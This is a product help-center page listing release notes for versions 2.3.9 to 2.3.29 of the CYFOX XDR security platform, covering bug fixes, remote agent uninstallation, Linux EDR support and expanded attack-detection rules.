Skip to main content
XDR Version 2 Updates
Omer Kushmirski avatar
Written by Omer Kushmirski
Updated over a month ago

Introducing Software Updates

(Coming Soon)

The update introduces a new feature that allows users more control over their software updates. Whereas previously updates for agents and the server were automatic, now users can decide when and how to apply these updates. They have the option to schedule updates for a specific time that suits them or to manually initiate these updates as needed. This enhancement is designed to provide organizations with the flexibility to manage software updates in a way that minimizes disruption and aligns with their operational needs.

For detailed guidance on managing your software updates, please refer to the following guide.


XDR Version 2.3.29

12 Nov, 2024

This update delivers an important hotfix to reduce false positive alerts related to "Brute Force" attack detections. The rule "Credential Access | Brute Force - T1110" has been refined to improve accuracy and reduce unnecessary alerts.


XDR Version 2.3.28

11 Nov, 2024

XDR Version 2.03.28 introduces the first-ever support for uninstalling the agent directly via the server!

This new approach allows clients to remotely connect to any required agent and uninstall it, significantly reducing the complexity of managing inventory without the need for any third-party distribution tools.

A comprehensive guide to remote uninstallation can be found here.

In addition to this enhancement, Version 2.03.28 includes several enhancements and bug fixes:

  • Executive Summary Report: Corrected inaccuracies in the "managed devices" reporting.

  • Vulnerability Data Display: Resolved issues with incorrect data display for certain devices.

  • Improved loading times on the "Attack Hunter" page.

Lastly, in response to recent developments and evolving threats, version 2.03.28 introduces significant enhancements to the Attack Hunter engine, enabling it to detect approximately 100 new advanced attacks. These improvements are based on extensive research and refined detection rules for more precise threat identification.


XDR Version 2.3.27

10 Oct, 2024

Version 2.03.27 addresses a configuration issue with the File Integrity Monitoring (FIM) system reported by several clients. The issue caused agents to miss certain FIM policies and led to a "continuous loading" indicator appearing next to some policies.

The fix ensures that FIM policies are correctly applied to agents, and resolves the continuous loading issue. With this update, the scenario should no longer occur, improving overall policy deployment reliability.


XDR Version 2.3.26

9 Oct, 2024

Version 2.03.26 includes a new Agent version (2.3.3), which provides enhancements to event handling to prevent system overload. The Agent's algorithm for sending events to the server has been optimized, introducing a limitation on recurring events to ensure that failed events (e.g., due to no internet connection) are not repeatedly sent.

The following client-reported issues have been addressed and resolved:

  1. Agents that were not auto-updating to the latest version should now update correctly.

  2. Systems that appeared online in the portal but showed 'last sync pending' on client systems should now sync properly, allowing for accurate data and file restoration.

  3. Systems that were online but appeared offline in the portal due to the CYFOX service stopping should now display the correct status.

  4. The online agent count in the portal, which was fluctuating with every page refresh, should now remain stable.


XDR Version 2.3.25

17 Sept, 2024

XDR Version 2.03.25 introduces support for the first Linux EDR (Version 1.02.2), bringing initial prevention capabilities to Linux environments.

New Features and Enhancements in CYFOX's Linux EDR:

  1. Falco 0.38 Support (Modern BPF): CYFOX's Linux EDR supports modern BPF (Berkeley Packet Filter) technology, which enhances the system's ability to monitor and detect suspicious activity at the kernel level. BPF provides efficient and scalable filtering for security events, enabling real-time threat detection without compromising system performance.

  2. Persistent and Encrypted Local Storage: The Linux EDR now features persistent local storage that ensures data, such as logs or security-related information, is securely stored on the endpoint. This storage is encrypted, protecting the data even if the device is compromised or accessed by unauthorized users. This feature is critical for preserving evidence or maintaining configuration states between reboots.

  3. Advanced Prevention Capabilities: This update enhances the system’s ability to detect and prevent malicious behavior based on command-line activity and other suspicious indicators. The integration of the Command Line Hunter library allows for deeper analysis of command-line executions, helping to identify and block potential threats in real-time.

  4. File Integrity Monitoring (FIM) Support: CYFOX's Linux EDR supports File Integrity Monitoring (FIM), which monitors essential system files and directories for unauthorized or unexpected changes. This feature helps administrators detect suspicious modifications and potential security breaches, ensuring the integrity of system configurations and compliance with security policies.

Command Line Hunter: Advanced Real-Time Protection

CYFOX's Command Line Hunter provides real-time defense using AI-powered algorithms, continuously monitoring command lines and processes across endpoints. Its sophisticated detection capabilities analyze behaviors and patterns to identify potential threats. Once a malicious process is detected, it takes immediate action to terminate it, preventing further damage. The system also employs adaptive learning, continuously improving its detection capabilities by learning from new and emerging threats.

This update ensures robust security with enhanced detection and prevention measures tailored for


XDR Version 2.3.24

2 Sept, 2024

This update includes a critical hotfix addressing an issue where USB policies were not functioning correctly in certain policy scenarios.


XDR Version 2.3.22

20 Aug, 2024

XDR Version 2.03.22 introduces support for the new Agent (version 2.3.2.0), addressing several key issues outlined in this update.


XDR Version 2.3.21

5 Aug, 2024

XDR Version 2.03.21 addresses several critical issues reported by our clients to enhance the stability and performance of the CYFOX On Prem Server.

The updates focus on improving user experience, particularly for those managing larger networks and extensive endpoint data.

Bug Fixes

  • Network Map Responsiveness:

    • Addressed an issue causing the Network Map page to become unresponsive and crash, particularly in environments with larger networks and queries. Users should now experience stable and smooth navigation in this section.

  • Session Termination on Forensic Tab:

    • Resolved an issue reported by clients where navigating to the Forensic tab and then to Host Events resulted in a "Failed to load" error and forced disconnection to the main login page. This fix ensures seamless access to forensic data without unexpected session terminations.

  • FIM Configuration Issue: Fixed a problem where users could not add a host to the FIM. The updated FIM configuration now correctly detects agents, allowing seamless addition of hosts.

Note: These fixes primarily affect users with a significant number of endpoints (1,000 or more). The update ensures a more reliable and efficient experience for managing large-scale environments.


XDR Version 2.3.20

29 July, 2024

XDR Version 2.3.20 brings several bug fixes and performance improvements, particularly for on-premises servers operating with a large number of connections (up to 10,000 agents).

Key improvements in this version include:

  • Enhanced dashboard queries for easier navigation through the dashboard screen.

  • Reduced high CPU usage caused by unoptimized user interface queries.

Additionally, this update resolves an issue with license usage count for agents that were uninstalled. Some clients experienced continued license usage even after agents were removed. From version 2.3.20 onwards, the system automatically detaches a license once an agent is uninstalled, allowing it to be reused for other endpoints.

Lastly, version 2.3.20 integrates a new agent version (2.3), which includes several bug fixes. Detailed release notes for the latest agent version can be found here.


XDR Version 2.3.19

11 July, 2024

XDR Version 2.3.19 includes performance optimizations, for larger companies with up to 10,000 devices operating and reporting events.

  • Significantly improved Inventory queries, including Inventory, Asset Management Reports, and all related Inventory queries.

  • Enhanced performance for all Vulnerability queries on the Wall, including counters and the Vulnerabilities panel with hosts.

Additional Bug Fixes:

  • Fixed the time-picker in the Date-range-picker

  • Adjusted support for agent policy rules, including the ability to delete "unknown rules.


XDR Version 2.3.18

1 July, 2024

This version mainly includes API support for the folder/file exclusion feature, starting from AG.AI version 2.2.

In addition to the API support, the new version includes the following enhancements:

  • For servers reporting to the cloud, modified the Event Prioritization Mechanism to ensure the most important events are sent before the less important ones. For example, using this logic, Attack Hunter events will be sent before Forensics events when both have the same timestamp.

  • Added an option to test the connection of a Cloud URL (see Release Notes 2.3.13 for reference) before going live.

Version 2.3.18 also addresses the following bugs reported by customers:

  • Fixed an issue where the Network Inventory report failed to download ("Failed to download PDF report").


XDR Version 2.3.17

20 Jun, 2024

Version 2.03.17 resolves a critical issue affecting the Agent's functionality, specifically addressing the persistent UI Connection pop-up problem reported by our customers.


XDR Version 2.3.16

8 Jun, 2024

XDR Version 2.3.16 introduces significant enhancements and updates to the Attack Hunter engine, now capable of detecting a wider range of malicious network activities such as shellcode injection, post-exploitation enumeration, suspicious file transfers, and critical vulnerability exploits.

Additionally, the new ruleset has refined the FIM alert mechanisms to minimize false positives.

For a comprehensive and detailed view of the newly added rules, please refer to the following link.


XDR Version 2.3.14

1 June, 2024

XDR Version includes API support for the new AG.AI version 2.1.1.4


XDR Version 2.3.13

21 May, 2024

The update introduces an option for clients operating CYFOX in their own data centers, with the ability to configure to which cloud server (date center) they want to connect.

By default, the connection is set to cloud.cyfox.com, but clients can change this to report to their own data center.

Please note that this configuration only affects the reporting mechanism and does not impact other functionalities, such as licensing, which will still be managed through cloud.cyfox.com.

To change the cloud URL, the admin user of the XDR server should go to the "System Settings" menu item and select the "Maintenance" tab. In the "License Information" panel, choose the last item (Cloud URL) and configure it manually.

In addition, the new version has resolved the following bugs:

  • Resolved the issue causing the Network Inventory Report to fail to load.

  • Fixed the failure to check for attacks notification, caused by connectivity issues.

  • Fixed the "Country" field display issue in the System Settings tab.


XDR Version 2.3.12

24 Apr, 2024

The update introduces a new feature designed for Cloud-Only clients, enabling them to manage and create new users, download agents, and update their company information details independently, without requiring access through the parent MSSP/Distributor account. For additional information, please refer to the following guide.

Additional Bug Fixes & Enhancements Implemented in Core Version 2.03.12

  • Resolved geographical display issues in the Threats Geo Map

  • Corrected data display issues in the OS Report

  • Addressed data display issues in the Hosts Report

  • Fixed date range filtering problems in the Reports Panel

  • Updated Help Center and Documentation Links


XDR Version 2.3.10

17 Mar, 2024

The latest version now supports client local time zones, moving away from the universal time clock used by CYFOX servers. It automatically detects the server computer's local time and adjusts all data, including logs, alerts, and reports, to operate in accordance with this local time setting.

Lastly, this version includes significant bug fixes, particularly focusing on enhancing the reports mechanism, resolving FIM Configuration issues, and improving the "Apply Changes" functionality.


XDR Version 2.3.9

15 Jan, 2024

XDR version 2.3.9 includes enhancements focused on the Attack Hunter engine. This update brings forth a series of improvements and additions to identify additional MITRE ATT&CK techniques.

  • Incorporation of 7 new "network malware" techniques.

  • Addition of a novel "Unauthorized Access" technique to identify malware infections on both network and host levels.

  • Updating of the "Information Leak" technique to detect DHCP Spoofing/MITM attacks.

  • Integration of 7 new Artificial Intelligence IOCs into the Attack Hunter.

  • Revision of 2 "External Device Manipulation" techniques to detect suspicious USB actions.

  • Enhancement of 15 "Persistence" techniques in the Attack Hunter, aiming to reduce false positive alerts and improve overall security.

  • Introduction of a new "Deobfuscate/Decode Files or Information" signature to the Attack Hunter.

  • Updating of 20 "Defense Evasion" techniques to elevate security measures.

  • Introduction of 6 new "Discovery" techniques to the Attack Hunter.

  • Addition of 2 new "Proxy" techniques to the Attack Hunter, specifically geared towards the detection of advanced attacks and malware.

  • Refinement of 3 "Lateral Movement" techniques to reduce false positive alerts.

  • Updating of 5 "Execution" techniques to minimize false positive alerts and enhance accuracy.

Additionally, this version addresses critical bug fixes and performance issues, including:

  • Resolution of Attack Hunter configuration issues.

  • Addition of Timezone conversion to the client’s timezone and formatting date based on client system preferences.

  • EDR Support Extension in the UI.

  • Resolution of USB Policy design issues and bugs.

  • Addition of Google Captcha to the "Forgot password" page.

  • Fixing the "Apply changes" button issue.

  • Query optimization for Forensics Host/User events query.

  • Resolution of the issue preventing page changes inside Host Services.

Did this answer your question?